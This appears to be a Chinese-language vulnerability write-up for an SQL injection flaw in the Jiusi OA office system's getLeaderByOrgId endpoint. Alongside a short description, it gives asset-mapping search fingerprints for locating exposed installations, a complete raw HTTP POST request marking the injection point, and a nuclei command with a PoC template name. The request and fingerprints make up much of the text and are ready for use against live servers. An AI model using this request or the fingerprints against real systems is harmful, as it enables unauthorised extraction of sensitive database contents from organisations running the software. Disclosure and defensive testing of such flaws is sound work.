登录 白背景

九思OA getLeaderByOrgId存在SQL注入漏洞

一、漏洞简介

九思OA系统是安装、实施、学习、操作、维护的OA系统,由北京九思协同软件有限公司开发。九思OA getLeaderByOrgId存在SQL注入漏洞,攻击者可利用该漏洞获取数据库敏感信息。

二、影响版本

  • 九思OA

三、资产测绘

  • hunterweb.body="/jsoa/webmail/ajax_util.js"app.name=="九思 OA"
  • 特征

1701753331634-af657e2a-d0d2-47d9-8907-60d794e2eb29.png

四、漏洞复现

POST /jsoa/workflow/dwr/exec/workflowSync.getLeaderByOrgId.dwr HTTP/1.1
Content-Length: 220
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Cookie: JSESSIONID=87792DD477B29227870AD677726BD127; jsoaUserName=admin; MarkPwd=0
Connection: close

callCount=1
c0-scriptName=workflowSync
c0-methodName=getLeaderByOrgId
c0-id=*
c0-param0=
xml=true

1722953108521-eb394cb1-db99-4a54-be56-ae2ecb944b18.png

nuclei poc

./nuclei -l 1.txt -t xx.yaml

九思OA-workflowsync-getleaderbyorgid-sql注入_poc.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/ida0c3xgqdkf0p7m